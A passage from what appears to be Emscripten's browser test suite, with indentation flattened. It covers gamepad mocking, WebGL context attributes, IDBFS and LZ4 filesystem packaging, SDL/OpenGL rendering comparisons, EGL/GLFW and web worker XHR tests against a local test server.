self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2'])
# Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-sASYNCIFY', '-sEXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file('sub/file2.txt', 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file('subdir/file2.txt', '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
create_file('file3.txt', random_data, binary=True)
# compress in emcc, -sLZ4 tells it to tell the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
create_file('main.html', '''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
def test_mmap_lazyfile(self):
create_file('lazydata.dat', 'hello world')
create_file('pre.js', '''
Module["preInit"] = () => {
FS.createLazyFile('/', "lazy.txt", "lazydata.dat", true, false);
}
''')
self.emcc_args += ['--pre-js=pre.js', '--proxy-to-worker']
self.btest_exit(test_file('test_mmap_lazyfile.c'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
create_file(main, r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
create_file('worker_prejs.js', r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file('checksummer.c'), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', 'worker_prejs.js'])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-sUSE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': ([False],),
# Enabling FULL_ES3 also enables ES2 automatically
'proxy': ([True],)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-sFULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('third_party/glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('third_party/glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-sFULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-sFULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')),
